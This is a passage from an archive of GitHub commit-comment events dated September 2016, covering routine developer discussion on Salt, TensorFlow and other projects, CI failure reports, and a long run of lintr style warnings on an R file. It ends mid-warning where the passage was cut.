forces a refresh.  `expired_min` this give the user a option to increase performance of their runs by ignoring the force=True. If I had a large number of sls files I would be setting min to 10 minutes, but it needs to default to 0 so it acts like old versions.   Call pkg.refresh_db still allows the refresh to happen for users who choose to use expire_min, while debugging sls files.   With expired_min set running a state twice in a row would be a lot quicker, or someone who ran one state followed by another separate state.\r\n\r\nL430 Logic change on debug message which was to indicate an possible issue with the code or use. Change to log  more often but not indicate an issue.  I was trying to not over log, but point out a possible issue at the same time.  Some respects the 60 sec was a bit small, as a typical install would take over a minute.   I don't mind either way.  And also original I was not going to fix state/pkg.py forcing a refresh all the time, as I was trying it as it effects more than one platform. Since I have fixed  state/pkg.py it also reduces the need to point out the issue.\r\n\r\nL444 - L448 No return True if the refresh_db worked without errors. Come from a background of believing all functions should return something.   Also makes it easier to write tests.\r\n\r\n"}},"created_at":"2016-09-21T16:19:49Z"}
{"id":"4597346648","type":"CommitCommentEvent","actor":{"login":"damon-atkins"},"repo":{"name":"terminalmage/salt"},"payload":{"comment":{"id":19116479,"position":null,"line":null,"path":null,"commit_id":"f237fe4d528efd621e1f9adbeb149695e94e65a1","created_at":"2016-09-21T16:20:18Z","updated_at":"2016-09-21T16:20:18Z","body":"`SaltRenderError`  Thanks missed the move."}},"created_at":"2016-09-21T16:20:18Z"}
{"id":"4597351562","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19116488,"position":null,"line":null,"path":null,"commit_id":"352ee579f197aa427903b7b5af845487da88e1cb","created_at":"2016-09-21T16:21:09Z","updated_at":"2016-09-21T16:21:09Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1088](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13815&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Tests failed: 15 (15 new), passed: 207, ignored: 3 Build time: 00:08:15\n### Failed tests\n```\norg.genivi.sota.device_registry.DeviceResourceSpec.GET request with ?regex yields devices which match the regex.: <no details avaliable>\n\norg.genivi.sota.device_registry.DeviceResourceSpec.PUT request after POST succeeds with updated device.: <no details avaliable>\n\norg.genivi.sota.device_registry.DeviceResourceSpec.POST request with same deviceName fails with conflict.: <no details avaliable>\n\norg.genivi.sota.device_registry.DeviceResourceSpec.POST request with same deviceId fails with conflict.: <no details avaliable>\n\norg.genivi.sota.device_registry.DeviceResourceSpec.PUT request updates device.: <no details avaliable>\n\norg.genivi.sota.device_registry.DeviceResourceSpec.PUT request with same deviceName fails with conflict.: <no details avaliable>\n\norg.genivi.sota.device_registry.DeviceResourceSpec.PUT request with same deviceId fails with conflict.: <no details avaliable>\n\norg.genivi.sota.core.UpdateRequestResourceSpec.accepts new updates with a Client specific format: <no details avaliable>\n\norg.genivi.sota.core.DeviceResourceSpec.search with status=true returns current status for a device: <no details avaliable>\n\norg.genivi.sota.core.PackagesResourceSpec.returns package blacklist info when searching blacklisted package: <no details avaliable>\n\norg.genivi.sota.core.transfer.DeviceUpdatesSpec.when multiple packages are pending sorted by installPos: <no details avaliable>\n\n\n##### there are 5 more failed tests, see build details\n```\n"}},"created_at":"2016-09-21T16:21:09Z"}
{"id":"4597356899","type":"CommitCommentEvent","actor":{"login":"ilya-g"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19116494,"position":null,"line":null,"path":null,"commit_id":"1a92eca81fd1c0ae4e3dbe52d308fa7afe0067d7","created_at":"2016-09-21T16:22:00Z","updated_at":"2016-09-21T16:22:00Z","body":"All tests passed, going to merge"}},"created_at":"2016-09-21T16:22:00Z"}
{"id":"4597361127","type":"CommitCommentEvent","actor":{"login":"FenrirWillow"},"repo":{"name":"elsys/survival-guide"},"payload":{"comment":{"id":19116500,"position":25,"line":25,"path":"11-linux.md","commit_id":"662cbb3d53692e9cb939dbee84d737768ee2cf8d","created_at":"2016-09-21T16:22:43Z","updated_at":"2016-09-21T16:22:43Z","body":"За по-напредналите от тях - в терминала: `docker run -it -v <path/to/projects>:/usr/` ubuntu:16.04 /bin/bash` Това ще им spawn-е много бурзо виртуална машина с Ubuntu и mount-нати папки където да работят. Създайте им (или ако нямате време аз ще ви създам) един Docker image с всичките компилатори и прочее за да могат много бързо да започват и да не трябва всеки път да започват от нулата."}},"created_at":"2016-09-21T16:22:43Z"}
{"id":"4597361625","type":"CommitCommentEvent","actor":{"login":"vrv"},"repo":{"name":"tensorflow/tensorflow"},"payload":{"comment":{"id":19116501,"position":null,"line":null,"path":null,"commit_id":"6cc37af4fb179c11504874d60ad53e4a91a4a887","created_at":"2016-09-21T16:22:48Z","updated_at":"2016-09-21T16:22:48Z","body":"So with the following simpler code, it does the right thing:\r\n\r\n```\r\nimport tensorflow as tf\r\n\r\nwith tf.device(\"/cpu:0\"):\r\n  params = tf.get_variable(\"params\", [1], tf.float32,\r\n                           initializer=tf.zeros_initializer)\r\nwith tf.device(\"/gpu:0\"):\r\n  update_constant = tf.constant(1, shape=[1], dtype=tf.float32,\r\n                                name=\"update_constant\")\r\n  add_op = params.assign_add(update_constant)\r\n\r\ninit_op = tf.initialize_all_variables()\r\n\r\nconfig=tf.ConfigProto(log_device_placement=True)\r\nwith tf.Session(config=config) as sess:\r\n  sess.run(init_op)\r\n  sess.run(add_op)\r\n```\r\n\r\nproduces:\r\n\r\n```\r\nparams: /job:localhost/replica:0/task:0/cpu:0\r\nAssignAdd: /job:localhost/replica:0/task:0/cpu:0\r\nparams/read: /job:localhost/replica:0/task:0/cpu:0\r\nparams/Assign: /job:localhost/replica:0/task:0/cpu:0\r\ninit: /job:localhost/replica:0/task:0/cpu:0\r\nupdate_constant: /job:localhost/replica:0/task:0/gpu:0\r\nparams/Initializer/zeros: /job:localhost/replica:0/task:0/cpu:0\r\n```\r\n\r\nSo maybe there's something special that happens with the distributed impl."}},"created_at":"2016-09-21T16:22:48Z"}
{"id":"4597364357","type":"CommitCommentEvent","actor":{"login":"gjhoon"},"repo":{"name":"likelion-kau1/malangKau"},"payload":{"comment":{"id":19116509,"position":null,"line":null,"path":null,"commit_id":"806ce8dade208d5d09308ba05d39464e867d5061","created_at":"2016-09-21T16:23:16Z","updated_at":"2016-09-21T16:23:16Z","body":"devise 젬 삭제하고 회원가입만 만들었어요"}},"created_at":"2016-09-21T16:23:16Z"}
{"id":"4597374971","type":"CommitCommentEvent","actor":{"login":"l2fprod"},"repo":{"name":"IBM-Bluemix/logistics-wizard-webui"},"payload":{"comment":{"id":19116538,"position":27,"line":85,"path":"src/modules/demos.js","commit_id":"f78586d209bb4d7256ff23b0ae158435b5662ea6","created_at":"2016-09-21T16:25:03Z","updated_at":"2016-09-21T16:25:03Z","body":"Yes, I stopped after calling the API to create user, that was already a big step forward in my understanding :)\r\n\r\nOne thing we should do is to reuse the token obtained for a given user.  We don't want to login every time we switch users in the RoleSwitcher. The login should be needed only if we don't have a token for this specific user or if it has expired - something we can see by looking at the decoded token or if we get a 401. So we will need to store the token issued for a specific user across sessions."}},"created_at":"2016-09-21T16:25:03Z"}
{"id":"4597379359","type":"CommitCommentEvent","actor":{"login":"cladcladclad"},"repo":{"name":"cladcladclad/FIFA-CM-History"},"payload":{"comment":{"id":19116556,"position":null,"line":null,"path":null,"commit_id":"724e51b8f5ec5ed5b36f2ae7df0344fddcda1ca6","created_at":"2016-09-21T16:25:44Z","updated_at":"2016-09-21T16:25:44Z","body":"Ver 1.0 changelog:\r\n- increased length of Career Mode tabs to FIFA's full 15 seasons\r\n- added additional rows in player list, allowing for 70 total players\r\n- added instructions to clarify how to use player list - DO NOT REMOVE PLAYERS"}},"created_at":"2016-09-21T16:25:44Z"}
{"id":"4597379822","type":"CommitCommentEvent","actor":{"login":"mykmelez"},"repo":{"name":"mozilla/positron"},"payload":{"comment":{"id":19116558,"position":null,"line":null,"path":null,"commit_id":"46799e7206736db0e03b7ce6f6dc9e30fadd5fd7","created_at":"2016-09-21T16:25:49Z","updated_at":"2016-09-21T16:25:49Z","body":"> @mykmelez Nit: Why don't comment it as 3 * 60 * 60 (seconds)?\r\n\r\nHmm, I suppose that would explain how I calculated the number, but I'm more concerned with explaining what the number represents, so readers can tell at a glance that the timeout is three hours. (If someone then wants to modify it, which will happen less often, the calculation is easy to redo.)"}},"created_at":"2016-09-21T16:25:49Z"}
{"id":"4597381197","type":"CommitCommentEvent","actor":{"login":"Majkl578"},"repo":{"name":"nette/di"},"payload":{"comment":{"id":19116562,"position":8,"line":89,"path":"src/DI/PhpReflection.php","commit_id":"5adb374d919c57a84491d1fde5f3b119fd55bd05","created_at":"2016-09-21T16:26:02Z","updated_at":"2016-09-21T16:26:02Z","body":"> IMHO annotations are dead\r\n\r\nNot quite yet until generics, now you can use them to hint IDE what the return collection type is.\r\n\r\n```\r\n@var Foo[]\r\n@var Collection|Foo[]\r\n```"}},"created_at":"2016-09-21T16:26:02Z"}
{"id":"4597383739","type":"CommitCommentEvent","actor":{"login":"L3K0V"},"repo":{"name":"elsys/survival-guide"},"payload":{"comment":{"id":19116569,"position":25,"line":25,"path":"11-linux.md","commit_id":"662cbb3d53692e9cb939dbee84d737768ee2cf8d","created_at":"2016-09-21T16:26:27Z","updated_at":"2016-09-21T16:26:27Z","body":"Това е готина идея, за която не се бях сетил.\r\nАко искаш и имаш време направо пиши и пусни един pull-request. Както виждаш, сме още мнооого в началото 😄 и сме с ограничен ресурс.\r\n\r\n**BTW:** за докера ако си наясно ще те разпитам, как да рънваме бързо, лесно и вкусно едни питонски скриптове, дето проверяват домашни, да си лийкват памети в контейнера."}},"created_at":"2016-09-21T16:26:27Z"}
{"id":"4597384124","type":"CommitCommentEvent","actor":{"login":"heatherbradfield"},"repo":{"name":"heatherbradfield/AnimalSounds"},"payload":{"comment":{"id":19116573,"position":null,"line":null,"path":null,"commit_id":"c5e6f9ccbcb447145a314582a298f8bbd010a9c1","created_at":"2016-09-21T16:26:31Z","updated_at":"2016-09-21T16:26:31Z","body":"I don't really know what you added...what is this xml file and what is it used for? It looks like something already generated by IDEA. Also I tried to run our applet after you made these changes and this xml file cannot be parsed and the applet wont run. We may have to revert to the version before you submitted this code."}},"created_at":"2016-09-21T16:26:31Z"}
{"id":"4597385444","type":"CommitCommentEvent","actor":{"login":"harishpro"},"repo":{"name":"Akash-Sinha/AndroidTraining-2016-17"},"payload":{"comment":{"id":19116578,"position":null,"line":null,"path":null,"commit_id":"7bbaf367351737cbf498b8d630643a2408c564ec","created_at":"2016-09-21T16:26:46Z","updated_at":"2016-09-21T16:26:46Z","body":"#program for word separator\r\nimport java.util.*;\r\n\r\npublic class Main\r\n{\r\n\tpublic static void main(String[] args)\r\n\t{\r\n\t\tSystem.out.println(\"Hello World!\");\r\n\t\tScanner sc = new Scanner(System.in);\r\n\t\t\r\n\t\tString s ;\r\n\t\tSystem.out.println(\"enter a name : \");\r\n\t\tStringBuilder sb = new StringBuilder(sc.nextLine());\r\n\t\tSystem.out.println(\"enter a seperator : \");\r\n\t\ts=sc.nextLine();\r\n\t\twhile(true)\r\n\t\t{\r\n\t\t\tif(sb.indexOf(s)!=-1)\r\n\t\t\t\tsb.delete(sb.indexOf(s) , sb.indexOf(s) + s.length());\r\n\t\t\telse\r\n\t\t\t\tbreak;\r\n\t\t\t\t\r\n\t\t}\r\n\t\tSystem.out.println(sb);\r\n\t\t}\r\n\t\t\r\n}"}},"created_at":"2016-09-21T16:26:46Z"}
{"id":"4597386845","type":"CommitCommentEvent","actor":{"login":"TheAlphaNerd"},"repo":{"name":"node-red/node-red-node-openwhisk"},"payload":{"comment":{"id":19116582,"position":null,"line":null,"path":null,"commit_id":"2f64c0358ef71503ee418c1058a40c51a334ca2b","created_at":"2016-09-21T16:27:00Z","updated_at":"2016-09-21T16:27:00Z","body":"🎉\r\n\r\nmuch love for spdx"}},"created_at":"2016-09-21T16:27:00Z"}
{"id":"4597388985","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19116586,"position":null,"line":null,"path":null,"commit_id":"74433cbb8e22190e75620292ea1cca2461d1dac0","created_at":"2016-09-21T16:27:22Z","updated_at":"2016-09-21T16:27:22Z","body":"update_standards_gem (asparke2) - x86_64-MacOS-10.10-clang: OK (2384 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-74433cbb8e22190e75620292ea1cca2461d1dac0-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-74433cbb8e22190e75620292ea1cca2461d1dac0-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-97.39%25-yellow.svg)</a> \n"}},"created_at":"2016-09-21T16:27:22Z"}
{"id":"4597389456","type":"CommitCommentEvent","actor":{"login":"yaroslavvb"},"repo":{"name":"tensorflow/tensorflow"},"payload":{"comment":{"id":19116589,"position":null,"line":null,"path":null,"commit_id":"6cc37af4fb179c11504874d60ad53e4a91a4a887","created_at":"2016-09-21T16:27:25Z","updated_at":"2016-09-21T16:27:25Z","body":"@mrry tipped me off to `tf.device(` being ignored in the distributed snippet above so maybe he knows why"}},"created_at":"2016-09-21T16:27:25Z"}
{"id":"4597389453","type":"CommitCommentEvent","actor":{"login":"sayeed99"},"repo":{"name":"TheSSJ/zf2_mmkernel"},"payload":{"comment":{"id":19116590,"position":null,"line":null,"path":null,"commit_id":"6953894b56545315640416725168c518a80d2751","created_at":"2016-09-21T16:27:27Z","updated_at":"2016-09-21T16:27:27Z","body":"Was working really good on my side, a bit more explanation will be helpful, I will get this fixed in KA if you want. "}},"created_at":"2016-09-21T16:27:27Z"}
{"id":"4597389955","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"thijsjanzen/STEPCAM"},"payload":{"comment":{"id":19116592,"position":null,"line":null,"path":null,"commit_id":"f0710e5ed19ef189092f849b98031f2530f113e4","created_at":"2016-09-21T16:27:30Z","updated_at":"2016-09-21T16:27:30Z","body":"[R/ABC_SMC.R:3:1:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L3) *style:* **Variable and function names should be all lowercase.**\n```r\n​getRandomVals <- function(max_val)  {\n^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:16:1:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L16) *style:* **Variable and function names should be all lowercase.**\n```r\n​getFromPrevious <- function(inds, ws, disps, filts, comps)  {\n^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:23:1:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L23) *style:* **Variable and function names should be all lowercase.**\n```r\n​calculateWeight <- function(params, target, sigma,\n^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:26:68:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L26) *style:* **Commas should always have a space after.**\n```r\n​  diff <- params[target] - cbind(disp_vals, filt_vals, comp_vals)[,target]\n                                                                   ^\n```\n[R/ABC_SMC.R:27:54:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L27) *style:* **Trailing whitespace is superfluous.**\n```r\n​  vals <- weights * dnorm(diff, mean = 0, sd = sigma)  \n                                                     ^~\n```\n[R/ABC_SMC.R:28:12:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L28) *style:* **Put spaces around all infix operators.**\n```r\n​  return( 1/sum(vals) )\n          ~^~\n```\n[R/ABC_SMC.R:32:1:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L32) *style:* **Variable and function names should be all lowercase.**\n```r\n​normalizeWeights <- function(x) {\n^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:66:1:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L66) *style:* **Variable and function names should be all lowercase.**\n```r\n​calculateDistance <- function(rich, even, div, opt_diff, obs, sd_vals)  {\n^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:70:40:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L70) *style:* **Put spaces around all infix operators.**\n```r\n​  fit_optima <- (opt_diff / sd_vals[4])^2\n                                      ~^~\n```\n[R/ABC_SMC.R:78:21:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L78) *style:* **Variable and function names should be all lowercase.**\n```r\n​ABC_SMC <- function(numParticles, species_fallout, taxa, esppres, n_traits,\n                    ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:80:46:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L80) *style:* **Variable and function names should be all lowercase.**\n```r\n​                    abundances, frequencies, stopRate, Ord, \n                                             ^~~~~~~~\n```\n[R/ABC_SMC.R:80:60:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L80) *style:* **Trailing whitespace is superfluous.**\n```r\n​                    abundances, frequencies, stopRate, Ord, \n                                                           ^\n```\n[R/ABC_SMC.R:86:52:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L86) *style:* **Trailing whitespace is superfluous.**\n```r\n​           \"one of the community summary statistics \n                                                   ^\n```\n[R/ABC_SMC.R:90:10:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L90) *style:* **Variable and function names should be all lowercase.**\n```r\n​  res <- detMnbsp(Ord, abundances)\n         ^~~~~~~~\n```\n[R/ABC_SMC.R:90:10:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L90) *warning:* **no visible global function definition for ‘detMnbsp’**\n```r\n​  res <- detMnbsp(Ord, abundances)\n         ^~~~~~~~\n```\n[R/ABC_SMC.R:93:18:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L93) *style:* **Variable and function names should be all lowercase.**\n```r\n​  disp_vals <- 1:numParticles\n                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:94:18:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L94) *style:* **Variable and function names should be all lowercase.**\n```r\n​  filt_vals <- 1:numParticles\n                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:95:18:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L95) *style:* **Variable and function names should be all lowercase.**\n```r\n​  comp_vals <- 1:numParticles\n                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:97:13:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L97) *style:* **Variable and function names should be all lowercase.**\n```r\n​  fits <- 1:numParticles\n            ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:98:17:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L98) *style:* **Variable and function names should be all lowercase.**\n```r\n​  rich_vec <- 1:numParticles\n                ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:99:16:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L99) *style:* **Variable and function names should be all lowercase.**\n```r\n​  eve_vec <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:100:16:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L100) *style:* **Variable and function names should be all lowercase.**\n```r\n​  div_vec <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:101:16:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L101) *style:* **Variable and function names should be all lowercase.**\n```r\n​  opt_vec <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:107:21:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L107) *style:* **Variable and function names should be all lowercase.**\n```r\n​  weights <- rep(1, numParticles)\n                    ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:108:26:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L108) *style:* **Variable and function names should be all lowercase.**\n```r\n​  next_weights <- rep(1, numParticles)\n                         ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:109:16:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L109) *style:* **Variable and function names should be all lowercase.**\n```r\n​  indices <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:121:7:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L121) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n      ^\n```\n[R/ABC_SMC.R:121:10:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L121) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n         ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:121:23:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L121) *style:* **Commas should always have a space after.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n                      ^\n```\n[R/ABC_SMC.R:121:29:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L121) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n                            ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:143:5:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L143) *style:* **Variable and function names should be all lowercase.**\n```r\n​    numberAccepted <- 0\n    ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:144:28:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L144) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if (t != 1) weights <- normalizeWeights(weights)\n                           ^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:144:28:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L144) *warning:* **no visible global function definition for ‘normalizeWeights’**\n```r\n​    if (t != 1) weights <- normalizeWeights(weights)\n                           ^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:152:12:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L152) *style:* **Variable and function names should be all lowercase.**\n```r\n​    while (numberAccepted <= numParticles) {\n           ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:152:30:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L152) *style:* **Variable and function names should be all lowercase.**\n```r\n​    while (numberAccepted <= numParticles) {\n                             ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:156:19:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L156) *style:* **Variable and function names should be all lowercase.**\n```r\n​        params <- getRandomVals(species_fallout)\n                  ^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:156:19:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L156) *warning:* **no visible global function definition for ‘getRandomVals’**\n```r\n​        params <- getRandomVals(species_fallout)\n                  ^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:158:19:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L158) *style:* **Variable and function names should be all lowercase.**\n```r\n​        params <- getFromPrevious(indices, weights,\n                  ^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:160:19:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L160) *warning:* **no visible global function definition for ‘perturb’**\n```r\n​        params <- perturb(params, sigma)\n                  ^~~~~~~\n```\n[R/ABC_SMC.R:170:1:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L170) *style:* **Trailing whitespace is superfluous.**\n```r\n​     \n^~~~~\n```\n[R/ABC_SMC.R:174:40:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L174) *style:* **Commas should always have a space after.**\n```r\n​      traits <- as.data.frame(species[,c(2:(n_traits+1))],\n                                       ^\n```\n[R/ABC_SMC.R:174:53:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L174) *style:* **Put spaces around all infix operators.**\n```r\n​      traits <- as.data.frame(species[,c(2:(n_traits+1))],\n                                                   ~^~\n```\n[R/ABC_SMC.R:175:40:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L175) *style:* **Put spaces around all infix operators.**\n```r\n​                              row.names=c(1:taxa))\n                                      ~^~\n```\n[R/ABC_SMC.R:179:1:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L179) *style:* **Trailing whitespace is superfluous.**\n```r\n​      \n^~~~~~\n```\n[R/ABC_SMC.R:180:20:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L180) *style:* **Variable and function names should be all lowercase.**\n```r\n​      FD_output <- strippedDbFd(Ord, communities, \n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:180:50:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L180) *style:* **Trailing whitespace is superfluous.**\n```r\n​      FD_output <- strippedDbFd(Ord, communities, \n                                                 ^\n```\n[R/ABC_SMC.R:181:64:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L181) *style:* **Trailing whitespace is superfluous.**\n```r\n​                                m = res[[1]], nb.sp = res[[2]]) \n                                                               ^\n```\n[R/ABC_SMC.R:182:1:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L182) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/ABC_SMC.R:184:29:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L184) *style:* **Trailing whitespace is superfluous.**\n```r\n​      FRic <- FD_output$FRic \n                            ^\n```\n[R/ABC_SMC.R:186:29:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L186) *style:* **Trailing whitespace is superfluous.**\n```r\n​      FEve <- FD_output$FEve \n                            ^\n```\n[R/ABC_SMC.R:188:29:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L188) *style:* **Trailing whitespace is superfluous.**\n```r\n​      FDiv <- FD_output$FDiv \n                            ^\n```\n[R/ABC_SMC.R:197:69:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L197) *style:* **Trailing whitespace is superfluous.**\n```r\n​      # calculate distance of trait mean between simulated community \n                                                                    ^\n```\n[R/ABC_SMC.R:201:72:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L201) *style:* **Trailing whitespace is superfluous.**\n```r\n​      # (inverse) fit of model: euclidian distance of FD and trait mean \n                                                                       ^\n```\n[R/ABC_SMC.R:203:14:](https://github.com/thijsjanzen/STEPCAM/blob/f0710e5ed19ef189092f849b98031f2530f113e4/R/ABC_SMC.R#L203) *style:* **Variable and function names should be all lowercase.**\n```r\n​      fit <- calculateDistance(FRic[[1]], FEve[[1]], FDiv[[1]],\n             